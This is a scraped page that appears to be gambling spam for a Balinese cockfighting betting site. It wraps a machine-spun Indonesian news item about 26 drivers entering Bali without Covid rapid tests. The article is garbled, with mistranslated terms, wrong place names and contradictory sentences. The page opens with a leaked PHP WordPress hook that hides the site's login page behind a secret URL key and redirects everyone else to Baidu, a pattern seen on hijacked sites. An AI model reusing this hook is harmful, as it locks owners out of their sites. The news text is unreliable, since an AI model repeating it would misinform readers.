//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Tanpa hasil tes cepat, tim Satgas Covid-19 mendapat jaminan keselamatan dari 26 pembalap di luar Bali | adu ayam bali_s128.net login_s128.live

Tanpa hasil tes cepat, tim Satgas Covid-19 mendapat jaminan keselamatan dari 26 pembalap di luar Bali

Wartawan Tribun Bali I Putu Supartika melaporkan di DENPASAR-TRIBUNNEWS.COM-Sedikitnya 26 pengemudi logistik dan furnitur dari luar Bali melewati Bali tanpa hasil tes cepat. pulau. — Mereka melarikan diri dari Kedah. Pelabuhan Gilimanuk dan penjaminan keamanan Senin (6/8/2020) Tim gabungan Satgas Covid-19 dari Denpasar dan Kota Padang berada di Dermaga Mengwei. Uji cepat semua driver yang melewati port. Ketapang-Gilimanuk. Ini adalah keputusan bersama yang dibuat oleh pengemudi untuk bersama-sama bertanggung jawab atas logistik. Ketut Sriawan, Dinas Perhubungan Kota Denpasar.

Setelah pengemudi diamankan, ia langsung melakukan quick test. Tes dibagi menjadi dua bagian yang dilakukan oleh Dinas Kesehatan Kota Denpasar hingga Dermaga Mengwei. Tes dilakukan oleh Dinas Kesehatan Badung. Wangwang (Wandilan) DPRD Kabupaten Badung (Bupati ke Wantilan DPRD Kabupaten Badung)

“Kita lakukan quick test, dan jika hasilnya negatif akan kami berikan partisipasi Karena saya membawa logistik yang merupakan kebutuhan pokok masyarakat. ”

Baca: Azriel Tak Bisa Pulihkan Perlakuan Raul Lemos, Ancaman Tebar Kutukan

Diantara 26 Pembalap yang Diuji, Tidak Ada Hasil yang Menanggapi-Apalagi Sriawan Menarik Pembalap atau Mereka berharap sesampainya di Kota Denpasar mendapatkan hasil rapid test negatif, mengikuti himbauan pemerintah pusat dan daerah, serta selalu menerapkan prosedur sanitasi. Safety 26 driver dari luar Bali gagal memberikan hasil rapid test

Leave a comment

adu ayam bali_s128.net login_s128.live